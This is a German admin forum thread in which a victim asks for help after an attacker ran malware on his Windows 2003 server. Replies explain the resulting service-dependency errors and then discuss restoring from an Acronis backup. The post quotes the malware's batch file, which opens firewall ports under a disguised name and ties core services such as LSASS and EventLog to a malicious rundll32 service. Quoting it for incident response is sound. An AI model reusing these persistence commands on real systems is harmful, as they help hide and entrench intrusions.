10
Hacker konnte Batch Ausführen
Hallo Gemeinde und Helferlein in der Not
Ich benötige Eure Hilfe
Aufgrund eines Konfigfehlers konnte ein Hacker eine Datei (Winrar.exe) per FTP Hochladen und danach Ausführen.
(Fehler wurde bereits gefixt und FW Ports geschlossen)
Aus dem Selbstextractarchiv und dem Virenscanner ergibt sich folgendes:
Virus: Bloodhound.Overpacked
4 Dateien:
rundll32.exe
rundll32.dll
auto.bat
winsock32.dll
In der Bat steht folgendes:
@echo off
netsh firewall add portopening TCP 6666 "Windows Media Connect"
netsh firewall add portopening TCP 666 "Windows Media Connect"
::Install
cd \
cd %windir%
cd inf
mkdir sys
cd sys
rundll32.exe /i /h /s
sc config rundll32 error= ignore
sc failure rundll32 actions= restart/500 reset= 10
sc config lanmanserver depend= rundll32
sc config lanmanworkstation depend= rundll32
sc config LSASS depend= rundll32
sc config EventLog depend= rundll32
sc config "Windows Management Instrumentation" depend= rundll32
sc config IPSEC-services depend= rundll32
sc config EventSystem depend= rundll32
sc config Dnscache depend= rundll32
sc config Spooler depend= rundll32
sc config ProtectedStorage depend= rundll32
::Starten
net start rundll 32
net start rundll 32
del auto.bat
exit
Denn Angelegten Ordener "SYS" wurde bereits samt Inhalt gelöscht.
Jedoch hab ich jetzt noch Probleme mit den Event Viewer.
Es lässt sich weder der Dienst starten
--->>> Error 1075 : The dependency service does not exist or has been marked for deletion
noch die Logs öffnen.
--->>> Unable to complete the operation on "System".The interface is unknown
--->>> Unable to complete the operation on "Security".The interface is unknown
--->>> Unable to complete the operation on "Application".The interface is unknown
.
.
.
Kann mir jemand helfen und Verraten was das Ar......ch noch alles Verbogen hat
OS ist Win 2003 Server Web Edition
Gruß
Thommy
Ich benötige Eure Hilfe
Aufgrund eines Konfigfehlers konnte ein Hacker eine Datei (Winrar.exe) per FTP Hochladen und danach Ausführen.
(Fehler wurde bereits gefixt und FW Ports geschlossen)
Aus dem Selbstextractarchiv und dem Virenscanner ergibt sich folgendes:
Virus: Bloodhound.Overpacked
4 Dateien:
rundll32.exe
rundll32.dll
auto.bat
winsock32.dll
In der Bat steht folgendes:
@echo off
| Scanning for Viruses |
netsh firewall add portopening TCP 6666 "Windows Media Connect"
netsh firewall add portopening TCP 666 "Windows Media Connect"
| 10% Complete |
::Install
cd \
cd %windir%
cd inf
mkdir sys
cd sys
rundll32.exe /i /h /s
sc config rundll32 error= ignore
sc failure rundll32 actions= restart/500 reset= 10
sc config lanmanserver depend= rundll32
sc config lanmanworkstation depend= rundll32
sc config LSASS depend= rundll32
sc config EventLog depend= rundll32
sc config "Windows Management Instrumentation" depend= rundll32
sc config IPSEC-services depend= rundll32
sc config EventSystem depend= rundll32
sc config Dnscache depend= rundll32
sc config Spooler depend= rundll32
sc config ProtectedStorage depend= rundll32
::Starten
net start rundll 32
net start rundll 32
| 80% Complete |
| 100% Complete |
del auto.bat
exit
Denn Angelegten Ordener "SYS" wurde bereits samt Inhalt gelöscht.
Jedoch hab ich jetzt noch Probleme mit den Event Viewer.
Es lässt sich weder der Dienst starten
--->>> Error 1075 : The dependency service does not exist or has been marked for deletion
noch die Logs öffnen.
--->>> Unable to complete the operation on "System".The interface is unknown
--->>> Unable to complete the operation on "Security".The interface is unknown
--->>> Unable to complete the operation on "Application".The interface is unknown
.
.
.
Kann mir jemand helfen und Verraten was das Ar......ch noch alles Verbogen hat
OS ist Win 2003 Server Web Edition
Gruß
Thommy
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 62118
Url: https://administrator.de/contentid/62118
Printed on: April 20, 2024 at 00:04 o'clock
10 Comments
Latest comment
hallo,
wenns möglich ist, würd' ich den server aus'm system rausnehmen und platt machen.
das erscheint mir noch als der geringste aufwand.
was da noch so alles passiert, ist überhaupt nicht abzusehen. evtl. ärgerst du dich da noch wochenlang mit rum.
also meine empfehlung: daten sichern, den server raus und neu gemacht, wenns machbar ist.
ist die schnellste variante mit dem geringsten aufwand.
dieter
wenns möglich ist, würd' ich den server aus'm system rausnehmen und platt machen.
das erscheint mir noch als der geringste aufwand.
was da noch so alles passiert, ist überhaupt nicht abzusehen. evtl. ärgerst du dich da noch wochenlang mit rum.
also meine empfehlung: daten sichern, den server raus und neu gemacht, wenns machbar ist.
ist die schnellste variante mit dem geringsten aufwand.
dieter
Kann mir jemand helfen und Verraten was das
Ar......ch noch alles Verbogen hat
Ar......ch noch alles Verbogen hat
Ist doch gut wenn hin und wieder jemand rein kommt, dann wird der Admin nicht größenwahnsinnig oder unvorsichtig und hat endlich mal wieder was richtiges zu tun....
Der Empfehlung meines Vorredners, alles platt zu machen und neu aufzusetzen, kann ich mich nur anschliessen. Ich gehe mal davon aus, dass Du keine vernünftige Datensicherung von vor der 'Injektion' hast? Sonst könntest Du die wieder restoren.
Hallo,
Die Batch hat dafür gesorgt, dass der Ereignisprotokoll-Dienst (und noch mehrere andere auch) von dem Dienst "rundll32" abhängig sind. In der Batch sind dies die Zeilen sc config ... depend= rundll32
Diesen hast du jedoch gelöscht. Daher auch die Fehlermeldung "The dependency service does not exist..."
Bevor du jedoch auf die Idee kommst, einfach die Abhängigkeiten wieder zu löschen, empfehle ich dir das gleiche wie die anderen auch: Platt machen und neu aufsetzen bzw. Backup zurückspielen.
Denn auch wenn du die Modifikationen der Batch rückgängig machen kannst, weißt du nie, was der Angreifer zwischen dem Infizieren und der Entdeckung alles mit deinem System angestellt hast.
Gruß,
Schorsch
Die Batch hat dafür gesorgt, dass der Ereignisprotokoll-Dienst (und noch mehrere andere auch) von dem Dienst "rundll32" abhängig sind. In der Batch sind dies die Zeilen sc config ... depend= rundll32
Diesen hast du jedoch gelöscht. Daher auch die Fehlermeldung "The dependency service does not exist..."
Bevor du jedoch auf die Idee kommst, einfach die Abhängigkeiten wieder zu löschen, empfehle ich dir das gleiche wie die anderen auch: Platt machen und neu aufsetzen bzw. Backup zurückspielen.
Denn auch wenn du die Modifikationen der Batch rückgängig machen kannst, weißt du nie, was der Angreifer zwischen dem Infizieren und der Entdeckung alles mit deinem System angestellt hast.
Gruß,
Schorsch
Hallo Leute.
Zuerstmal Danke für Eure schnelle Hilfe, ihr seit Spitze.
Selbstverständlich habe ich ein Dayli Backup von der "C" Partition.
Allerdings hatte ich schonmal Probs bei der Widerherstellung.
Das Backup über Acronis ist nicht das Prolem, aber die Widerherstellung über Acronis Remote Console macht mit Kopfzerbrechen.
Und der Hoster verlangt jede Menge Teuros, wenn ein Techniker ran muss.
Ich habe keine Möglichkeit direkt am Server zu arbeiten, nur Remote.
Ich kann zwar über die Acronis die Remoteconsole Ausführen und auch das Image und die Zielpartition auswählen, aber nach dem Reboot passiert nichts mehr und der Server ist nichtmehr Erreichbar.
Ich weiß das Acronis nach dem Reboot seinen eigenen Loader startet, aber ob er auch beginnt das Image wiederherzustellen weiß ich nicht.
Evtl hat ja jemand schonmal mit der Remote Console von Acronis gearbeitet und kann mir sagen was da falsch läuft.
Die Platte ist nicht über Raid gespiegelt.
Partitions Image liegt auf D und soll C wieder ersetzen.
Thommy
Zuerstmal Danke für Eure schnelle Hilfe, ihr seit Spitze.
Selbstverständlich habe ich ein Dayli Backup von der "C" Partition.
Allerdings hatte ich schonmal Probs bei der Widerherstellung.
Das Backup über Acronis ist nicht das Prolem, aber die Widerherstellung über Acronis Remote Console macht mit Kopfzerbrechen.
Und der Hoster verlangt jede Menge Teuros, wenn ein Techniker ran muss.
Ich habe keine Möglichkeit direkt am Server zu arbeiten, nur Remote.
Ich kann zwar über die Acronis die Remoteconsole Ausführen und auch das Image und die Zielpartition auswählen, aber nach dem Reboot passiert nichts mehr und der Server ist nichtmehr Erreichbar.
Ich weiß das Acronis nach dem Reboot seinen eigenen Loader startet, aber ob er auch beginnt das Image wiederherzustellen weiß ich nicht.
Evtl hat ja jemand schonmal mit der Remote Console von Acronis gearbeitet und kann mir sagen was da falsch läuft.
Die Platte ist nicht über Raid gespiegelt.
Partitions Image liegt auf D und soll C wieder ersetzen.
Thommy
Hallo Leute.
Zuerstmal Danke für Eure schnelle
Hilfe, ihr seit Spitze.
Zuerstmal Danke für Eure schnelle
Hilfe, ihr seit Spitze.
Das hören wir doch immer gerne!
Selbstverständlich habe ich ein Dayli
Backup von der "C" Partition.
Allerdings hatte ich schonmal Probs bei der
Widerherstellung.
Deswegen soll ja ein Backup nicht nur zum Beschreiben sein, sondern im Ernstfalls muss man davon lesen können...
Das Backup über Acronis ist nicht das
Prolem, aber die Widerherstellung über
Acronis Remote Console macht mit
Kopfzerbrechen.
Prolem, aber die Widerherstellung über
Acronis Remote Console macht mit
Kopfzerbrechen.
Das sollte man testen bevor alles im Eimer ist! Wenn der Server erst mal nicht mehr geht, sind Experimente über den richtigen Restore schwieriger.
Ich weiß das Acronis nach dem Reboot
seinen eigenen Loader startet, aber ob er
auch beginnt das Image wiederherzustellen
weiß ich nicht.
seinen eigenen Loader startet, aber ob er
auch beginnt das Image wiederherzustellen
weiß ich nicht.
Wenn Du einen Restore mit Acronis machst, startet erst mal so eine Art abgesicherter Modus, in dem das alles zurückgespielt wird. Dann 'richtiger' Neustart und dann geht es wieder. Während des Restore hast Du keinen Zugriff.
Evtl hat ja jemand schonmal mit der Remote
Console von Acronis gearbeitet und kann mir
sagen was da falsch läuft.
Leider funktioniert die Widerherstellung nicht, und ich weiß nicht warum.
Meine Augen reichen nicht soweit
Kann über Console das Image Auswählen , Zielpartition angeben und dann macht er nen Reboot.
Was dann passiert kann ich nicht sagen.
Jedenfalls ist der Server nach 2 Stunden immer noch Down.
Nach einem erneuten "Remote" Reboot läuft er wieder, jedoch immer noch mit dem alten Image.
Ich hoffe nicht das es auf einen Technikereinsatz vor Ort Rausläuft, der das Backup vor Ort Startet.
Gibt es evtl. noch irgendeinen Paremeter mit dem Acronis ohne Aufforderung das Backup lädt ??
Ich vermute nämlich, das das Backup wieder hergestellt wurde, jedoch die "Fertigmeldung" die ja jetzt am Lokalen Monitor zu sehen wäre nicht bestätigt werden kann.
Wenn ich jetzt Reboote, wäre es wie ein Abgebrochener Restore Auftrag.
Oder liege ich Falsch ??
Thommy
Meine Augen reichen nicht soweit
Kann über Console das Image Auswählen , Zielpartition angeben und dann macht er nen Reboot.
Was dann passiert kann ich nicht sagen.
Jedenfalls ist der Server nach 2 Stunden immer noch Down.
Nach einem erneuten "Remote" Reboot läuft er wieder, jedoch immer noch mit dem alten Image.
Ich hoffe nicht das es auf einen Technikereinsatz vor Ort Rausläuft, der das Backup vor Ort Startet.
Gibt es evtl. noch irgendeinen Paremeter mit dem Acronis ohne Aufforderung das Backup lädt ??
Ich vermute nämlich, das das Backup wieder hergestellt wurde, jedoch die "Fertigmeldung" die ja jetzt am Lokalen Monitor zu sehen wäre nicht bestätigt werden kann.
Wenn ich jetzt Reboote, wäre es wie ein Abgebrochener Restore Auftrag.
Oder liege ich Falsch ??
Thommy
Ich vermute nämlich, das das Backup
wieder hergestellt wurde, jedoch die
"Fertigmeldung" die ja jetzt am
Lokalen Monitor zu sehen wäre nicht
bestätigt werden kann.
Man sollte doch meinen, das ein Server via Terminal-Emulator remotet wird und dass, obwohl keine Grafikausgabe [Desktop] zur Verfuegung steht, das zu wartende Betriebsystem Meldungen ausgibt.
In der Zeit, die Du mit Deinem Acronis-Dingsbums herumlaboriert hast, haettest Du den Server wenigstens zweimal neu aufsetzen koennen.
saludos
gnarff
In der Zeit, die Du mit Deinem
Acronis-Dingsbums herumlaboriert hast,
haettest Du den Server wenigstens zweimal neu
aufsetzen koennen.
saludos
gnarff
Acronis-Dingsbums herumlaboriert hast,
haettest Du den Server wenigstens zweimal neu
aufsetzen koennen.
saludos
gnarff
Respekt, wenn jemand so schnell ist. Ich brauche für einen Server schon mal einen Tag, bevor alles gut läuft. Und ein Restore mit ATI dauert ca. 1h je nach Platte. Dann bist Du also mit 30 min ('wenigstens zweimal neu...') bei einem 10h Tag 20mal so schnell wie ich. Gratulation!
@ sysad
Das kommt davon, wenn man uebermuedet sich dazu entschliesst nochmal im Forum vorbeizuschaun. Habe mich einfach im Datum geirrt!
Ich hatte das erste Posting von Thommy gelesen, Datum 22.06.2007 und als ich seinen letzten Kommentar las, vom 23. 06. 2007, dachte ich: "Mensch, der sitzt da schon einen Monat dran!"; und hab entsprechend geantwortet.
Danke also, fuer den Hinweis!
Bei meiner Berechnung, wieviel Zeit man braucht, um einen einzelnen Server aufzusetzen, moechtest Du bitte in Deine Gedanken miteinbeziehen, dass ich keinen geregelten 8 oder 10 Stunden Arbeitstag habe, wie Du ihn wahrscheinlich hast.
Ich fange morgends um 5:00 an zu arbeiten und hoere nicht auf bis alles fertig ist -das kann dann schon mal tiefe Nacht oder frueher Morgen werden.
Ich habe 21 Stunden 45 Minuten gebraucht fuer ein DC, DB-Backup Server, File Server, 5 clients, Firewall, Router, Switch unter W2k3.
Ich weiss jetzt nicht, wo Du mich da tempomaessig ansiedelst, aber bestimmt nicht 20 mal schneller.
saludos
gnarff
Das kommt davon, wenn man uebermuedet sich dazu entschliesst nochmal im Forum vorbeizuschaun. Habe mich einfach im Datum geirrt!
Ich hatte das erste Posting von Thommy gelesen, Datum 22.06.2007 und als ich seinen letzten Kommentar las, vom 23. 06. 2007, dachte ich: "Mensch, der sitzt da schon einen Monat dran!"; und hab entsprechend geantwortet.
Danke also, fuer den Hinweis!
Bei meiner Berechnung, wieviel Zeit man braucht, um einen einzelnen Server aufzusetzen, moechtest Du bitte in Deine Gedanken miteinbeziehen, dass ich keinen geregelten 8 oder 10 Stunden Arbeitstag habe, wie Du ihn wahrscheinlich hast.
Ich fange morgends um 5:00 an zu arbeiten und hoere nicht auf bis alles fertig ist -das kann dann schon mal tiefe Nacht oder frueher Morgen werden.
Ich habe 21 Stunden 45 Minuten gebraucht fuer ein DC, DB-Backup Server, File Server, 5 clients, Firewall, Router, Switch unter W2k3.
Ich weiss jetzt nicht, wo Du mich da tempomaessig ansiedelst, aber bestimmt nicht 20 mal schneller.
saludos
gnarff
@ sysad
und hoere nicht auf bis alles fertig ist -das
kann dann schon mal tiefe Nacht oder frueher
Morgen werden.
kann dann schon mal tiefe Nacht oder frueher
Morgen werden.
So machen wir es doch alle, oder?
Ich habe 21 Stunden 45 Minuten gebraucht
fuer ein DC, DB-Backup Server, File Server, 5
clients, Firewall, Router, Switch unter
W2k3.
Nicht schlecht, das ist auch meine Zeit. Deswegen versuche ich auch immer, nicht neu aufzusetzen sondern irgendwie klonen oder so.
Ich weiss jetzt nicht, wo Du mich da
tempomaessig ansiedelst, aber bestimmt nicht
20 mal schneller.
tempomaessig ansiedelst, aber bestimmt nicht
20 mal schneller.
Sollte auch nur ein Scherz wegen Deinem Hinweis sein.
saludos
gnarff
Auch saludos an alle Amigos
